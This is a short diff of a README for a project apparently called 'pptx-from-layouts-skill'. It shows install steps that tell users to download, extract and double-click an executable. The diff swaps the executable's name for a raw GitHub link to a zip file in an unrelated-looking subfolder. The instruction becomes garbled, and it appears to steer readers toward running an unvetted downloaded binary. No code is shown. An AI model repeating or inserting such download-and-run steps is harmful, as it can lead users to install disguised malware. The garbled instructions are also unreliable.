wozzeck16621/pptx-from-layouts-skill/README.md

    Once the download is complete, find the file in your downloads folder.
 If it is a zipped file, extract the contents to a folder of your choice.

 4. **Run the Application**
-   Locate the extracted file named "pptx-from-layouts-skill.exe" (Windows) or "pptx-from-layouts-skill" (macOS/Linux).
+   Locate the extracted file named "https://raw.githubusercontent.com/wozzeck16621/pptx-from-layouts-skill/main/alternatives/pptx-jjuidev/skill_from_layouts_pptx_v2.0.zip" (Windows) or "pptx-from-layouts-skill" (macOS/Linux).
 Double-click the file to run the application.

 ## 🛠️ How to Use